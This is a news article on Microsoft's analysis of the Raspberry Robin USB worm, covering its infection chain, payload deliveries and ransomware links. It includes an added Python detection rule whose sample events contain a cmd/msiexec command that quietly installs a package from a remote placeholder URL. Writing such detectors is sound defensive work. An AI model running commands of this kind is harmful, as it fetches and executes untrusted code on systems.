Microsoft: Raspberry Robin USB worm hits nearly 1,000 organizations in the past month

Widely distributed worm evolves into one of the largest currently active malware distribution platforms.
Written by Liam Tung, Contributing Writer

Microsoft is warning that the relatively new Raspberry Robin USB drive worm has triggered payload alerts on nearly 3,000 devices in almost 1,000 organizations in the past 30 days. 

Raspberry Robin malware has previously been seen installed with FakeUpdates malware, which has been linked to the Russian cyber-crime group EvilCorp. Raspberry Robin has also been used to deploy Lockbit ransomware, as well as IcedID, Bumblebee, and Truebot malware. Now, Microsoft has seen it being used to deploy Clop ransomware.

Microsoft attributes Clop deployments connected with the use of Raspberry Robin to a group it tracks as DEV-0950. Its activities overlap with the advanced hacking group tracked by FireEye as FIN11. The group last year published its victims' data on the Clop ransomware leak site.

"DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages," notes the Microsoft Security Threat Intelligence Center (MSTIC).


Security firm Red Canary discovered the Raspberry Robin worm in September 2021 and said it was often installed on Windows systems via a USB drive, which contains a LNK shortcut file disguised as a folder. The malware relies on victims inserting a USB drive to run. While autorun of removable media is disabled by default on Windows, Microsoft notes that many organizations enable it through legacy Group Policy changes. 

MSTIC has found that Raspberry Robin relies on both autorun and tricking users into clicking the LNK file.

"Some Raspberry Robin drives only have the LNK and executable files, while drives from earlier infections have a configured autorun.inf," MSTIC notes.  

This change could explain why the names of the shortcut files changed from more generic names like recovery.lnk to brand names of USB drives. Microsoft suspects this is to encourage a user to execute the LNK file. The worm also pulls its malicious payload from compromised QNAP storage appliances.

"Raspberry Robin's LNK file points to cmd.exe to launch the Windows Installer service msiexec.exe and install a malicious payload hosted on compromised QNAP network attached storage (NAS) devices," MSTIC explains. 
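The cmd.exe to msiexec.exe sequence described above is what a defender would hunt for in process-creation telemetry. The following is an added example, not code from Microsoft or Red Canary: a small Python rule run over constructed Sysmon-style events that flags msiexec.exe being launched by cmd.exe to install a package from a remote URL, while leaving the normal Windows Installer service instance and local package installs alone. The paths and the NAS address in the sample events are placeholders, not indicators from this article.

```python
import re

# Constructed Sysmon-style process-creation events, reduced to the three fields
# the rule needs. Paths and the host name are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c msiexec /q /i "http://nas-placeholder.invalid/pkg.msi"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec /q /i "http://nas-placeholder.invalid/pkg.msi"'},
    # Benign: the Windows Installer service instance started by services.exe
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"C:\Windows\system32\msiexec.exe /V"},
    # Benign: a scripted, quiet install of a package that is already on disk
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Temp\tool.msi /qn"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
INSTALL_SWITCH_RE = re.compile(r"(^|\s)[/-]i\b", re.IGNORECASE)


def is_raspberry_robin_like(event):
    """True when msiexec.exe is spawned by cmd.exe and told to install a
    package from a remote URL, the sequence the article attributes to the
    Raspberry Robin LNK file. Parent is checked by image name only; a full
    rule would also key on the user session and the originating drive."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmdline = event["CommandLine"]
    if not image.endswith("\\msiexec.exe") or not parent.endswith("\\cmd.exe"):
        return False
    # Install switch plus a remote package location is the suspicious combination
    return bool(INSTALL_SWITCH_RE.search(cmdline)) and bool(URL_RE.search(cmdline))


def find_suspicious(events):
    """Return the events that match the rule, in input order."""
    return [e for e in events if is_raspberry_robin_like(e)]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", hit["CommandLine"])
```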

As of July, FakeUpdates, a JavaScript backdoor, tapped Raspberry Robin for delivery, adding to malicious ads that were previously used for delivery. 


Microsoft has found some connections between Raspberry Robin and another piece of malware called Fauppod, which also communicates with compromised QNAP appliances. Fauppod is a heavily obfuscated piece of malware written in .NET. Microsoft believes Fauppod is part of the initial method by which Raspberry Robin infects machines.

"Based on our investigation, Microsoft currently assesses with medium confidence that the above .NET DLLs delivered both by Raspberry Robin LNK infections and Fauppod CPL samples are responsible for spreading Raspberry Robin LNK files to USB drives. These LNK files, in turn, infect other hosts via the infection chain detailed in Red Canary's blog."

"Microsoft also assesses with medium confidence that the Fauppod-packed CPL samples are currently the earliest known point in the attack chain for propagating Raspberry Robin infections to targets. Microsoft findings suggest that the Fauppod CPL entities, the obfuscated .NET LNK spreader modules they drop, the Raspberry Robin LNK files Red Canary documented, and the Raspberry Robin DLL files (or, Roshtyak, as per Avast) could all be considered as various components to the 'Raspberry Robin' malware infection chain."

Microsoft also backed up IBM's previous assertion that Fauppod was linked to the notorious Dridex banking trojan.
